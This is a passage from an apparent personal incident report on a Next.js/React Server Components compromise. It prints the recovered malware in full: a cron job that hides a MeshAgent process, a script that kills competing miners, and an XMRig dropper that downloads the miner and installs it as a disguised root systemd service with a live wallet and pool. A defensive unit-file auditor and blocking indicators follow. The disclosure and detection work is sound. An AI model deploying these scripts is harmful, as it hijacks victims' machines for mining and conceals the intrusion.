total_web3=$(find "$SEARCH_PATH" -type f \( -iname "*web3*" -o -iname "*ethereum*" -o -iname "*hardhat*" -o -iname "*truffle*" \) 2>/dev/null | grep -Ev "$EXCLUDES" | wc -l)
log "Env files: ${GREEN}$total_env${NC}"
log "Wallet-related: ${RED}$total_wallet${NC}"
log "Web3/Blockchain: ${YELLOW}$total_web3${NC}"
log ""
log "${CYAN}Results saved to: ${LOG_FILE}${NC}"
log "${YELLOW}Warning: Please review highlighted files to ensure sensitive data is secure!${NC}"
```
Malware Sample 2: MeshAgent Process Hiding Cron Job
```bash
# Malware Sample 2: MeshAgent Process Hiding Cron Job
# Installed in: User crontab
# Execution: Every minute
* * * * * pgrep -f meshagent | while read pid; do mountpoint -q /proc/$pid || mount -o bind /tmp/empty /proc/$pid 2>/dev/null; done
```
Malware Sample 3: Crypto Miner Killer Script
```bash
# Malware Sample 3: Crypto Miner Killer Script
# File: /dev/health.sh
# Purpose: Kill competing malware to preserve resources
#!/bin/bash
while true; do
for proc_dir in /proc/[0-9]*; do
pid=${proc_dir##*/}
if strings "/proc/$pid/exe" 2>/dev/null | grep -q xmrig; then
kill -9 "$pid"
continue
fi
result=$(ls -l "/proc/$pid/exe" 2>/dev/null)
case "$result" in
*"(deleted)"* | *"xmrig"* | *"watcher"* | *"/tmp/a"* | *"softirq"* | *"rondo"*)
kill -9 "$pid"
;;
esac
done
sleep 45
done
```
Malware Sample 4: XMRig Monero Miner Dropper
NOTE: This appears to be a separate malware family, though deployed during the same compromise. It was found but not executed.
```bash
# Malware Sample 4: XMRig Monero Miner Dropper
# File: sex.sh
# Status: Found but not executed (caught before installation)
#!/bin/bash
# Configuration
TAR_FILE="kal.tar.gz"
EXTRACT_DIR="xmrig-6.24.0"
BINARY_PATH="$(pwd)/$EXTRACT_DIR/xmrig"
ARGS="--url pool.hashvault.pro:443 --user 89ASvi6ZBHXE6ykUZZFtqE1QqVhmwxCDCUvW2jvGZy1yP6n34uNdMKYj54ck81UC87KAKLaZT2L4YfC85ZCePDVeQPWoeAq --pass ZOVDC --donate-level 0 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
SERVICE_NAME="system-update-service"
# Download and setup if not already present
if [ ! -f "$BINARY_PATH" ]; then
curl -L -o "$TAR_FILE" --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" https://github.com/xmrig/xmrig/releases/download/v6.24.0/xmrig-6.24.0-linux-static-x64.tar.gz
tar xvzf "$TAR_FILE"
fi
chmod +x "$BINARY_PATH"
# Attempt systemd setup
INSTALLED_SYSTEMD=0
if [ "$(id -u)" -eq 0 ] && command -v systemctl >/dev/null 2>&1; then
echo "Root privileges detected. Attempting systemd setup..."
SERVICE_FILE="/etc/systemd/system/${SERVICE_NAME}.service"
cat <<EOF > "$SERVICE_FILE"
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=${BINARY_PATH} ${ARGS}
Restart=always
RestartSec=10
User=root
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable "$SERVICE_NAME"
systemctl start "$SERVICE_NAME"
if systemctl is-active --quiet "$SERVICE_NAME"; then
echo "Service started via systemd."
INSTALLED_SYSTEMD=1
fi
fi
# Fallback to nohup
if [ $INSTALLED_SYSTEMD -eq 0 ]; then
echo "Starting with nohup..."
nohup "$BINARY_PATH" $ARGS >/dev/null 2>&1 &
fi
```
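The unit file this dropper writes is what the `systemctl list-units` check in the IoC section is trying to spot by name, but the name is chosen to blend in. The shape of the unit is harder to disguise: the binary runs from whatever directory the script was started in rather than a system path, the arguments carry the pool URL and XMRig-specific flags, and the service restarts forever as root. The following is an added example written for this report (not code from the original post, from XMRig or from systemd) that audits unit files for exactly that shape. The two unit texts are constructed to mirror the dropper's heredoc and a stock nginx unit, with placeholders standing in for the wallet address and TLS fingerprint; `audit_unit_dir()` applies the same checks to /etc/systemd/system or /usr/lib/systemd/system on a real host. The trusted-path list, the token list and the function names are this example's assumptions.

```python
# Added example for this report (not code from the original post or from systemd):
# audit systemd unit files for the shape of the unit the dropper above writes:
# a generic description, an ExecStart binary that lives outside the system
# directories (the sample runs from whatever directory the script was started in),
# miner-style arguments, Restart=always and User=root. The unit texts below are
# constructed to mirror the sample with placeholders for the wallet and TLS
# fingerprint; audit_unit_dir() runs the same checks on a real unit directory.
from pathlib import Path

# Assumption: binaries under these prefixes are package-managed; adjust per host.
TRUSTED_BIN_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/",
                        "/usr/lib/", "/usr/libexec/", "/lib/")
# Fragments taken from the dropper's ARGS line and the report's IoCs.
SUSPICIOUS_ARG_FRAGMENTS = ("xmrig", "--donate-level", "--tls-fingerprint", "pool.")


def parse_unit(text):
    """Minimal parser for the INI-like unit format: {section: {key: [values]}}.
    Keys such as ExecStartPre may repeat, so every value is kept."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def audit_unit(text, unit_name="<unit>"):
    """Return human-readable findings for one unit file (empty list = clean)."""
    service = parse_unit(text).get("Service", {})
    findings = []
    outside_system_path = False
    for exec_line in service.get("ExecStart", []):
        parts = exec_line.split()
        if not parts:
            continue
        exec_path = parts[0].lstrip("-@+!:")  # systemd's executable prefixes
        if not exec_path.startswith(TRUSTED_BIN_PREFIXES):
            outside_system_path = True
            findings.append(f"{unit_name}: ExecStart binary outside system paths: {exec_path}")
        lowered = exec_line.lower()
        for frag in SUSPICIOUS_ARG_FRAGMENTS:
            if frag in lowered:
                findings.append(f"{unit_name}: ExecStart contains miner-like token '{frag}'")
    if (outside_system_path and service.get("User", [""])[0] == "root"
            and service.get("Restart", [""])[0] == "always"):
        findings.append(f"{unit_name}: non-system binary kept alive as root with Restart=always")
    return findings


def audit_unit_dir(directory):
    """Audit every *.service file in a directory such as /etc/systemd/system."""
    results = []
    for path in sorted(Path(directory).glob("*.service")):
        try:
            results.extend(audit_unit(path.read_text(), path.name))
        except OSError:
            continue
    return results


# Constructed unit texts (placeholders replace the wallet address and TLS fingerprint)
SAMPLE_MALICIOUS_UNIT = """\
[Unit]
Description=System Update Service
After=network.target

[Service]
Type=simple
ExecStart=/root/xmrig-6.24.0/xmrig --url pool.hashvault.pro:443 --user WALLET_PLACEHOLDER --donate-level 0 --tls --tls-fingerprint FINGERPRINT_PLACEHOLDER
Restart=always
RestartSec=10
User=root

[Install]
WantedBy=multi-user.target
"""
SAMPLE_BENIGN_UNIT = """\
[Unit]
Description=A high performance web server and a reverse proxy server

[Service]
Type=forking
ExecStart=/usr/sbin/nginx -g 'daemon on; master_process on;'
Restart=on-failure

[Install]
WantedBy=multi-user.target
"""

if __name__ == "__main__":
    for unit_text, name in ((SAMPLE_MALICIOUS_UNIT, "system-update-service.service"),
                            (SAMPLE_BENIGN_UNIT, "nginx.service")):
        print(name, audit_unit(unit_text, name) or "clean")
```

The path check is the one that generalises: the token list only catches this miner, but a root service whose ExecStart points into /root, /tmp, /dev or a home directory deserves a look whatever its name says.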
File Hashes for Threat Intelligence
Malware Binaries:
MD5: 3ba4d5e0cf0557f03ee5a97a2de56511 (/dev/x86)
Monero Wallet (for blocking):
89ASvi6ZBHXE6ykUZZFtqE1QqVhmwxCDCUvW2jvGZy1yP6n34uNdMKYj54ck81UC87KAKLaZT2L4YfC85ZCePDVeQPWoeAq
Mining Pool:
pool.hashvault.pro:443
Additional Resources
- React Security Advisory: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
- Next.js Update Guide: https://nextjs.org/docs/upgrading
- NIST CVE Database: https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Conclusion
This incident demonstrates the critical importance of rapid security patching. Attackers are actively scanning for and exploiting newly disclosed vulnerabilities within hours of public disclosure.
If you’re running Next.js or React Server Components, check your versions immediately and update if vulnerable. The exploitation is trivial and widespread.
Stay safe out there. 🔒
Disclosure: This report describes a real security incident on my personal infrastructure. All sensitive credentials mentioned in this report have been rotated. Technical details are shared to help the community defend against similar attacks.
Questions? Feel free to reach out or open an issue if you’ve experienced similar compromise.
Last Updated: December 6, 2025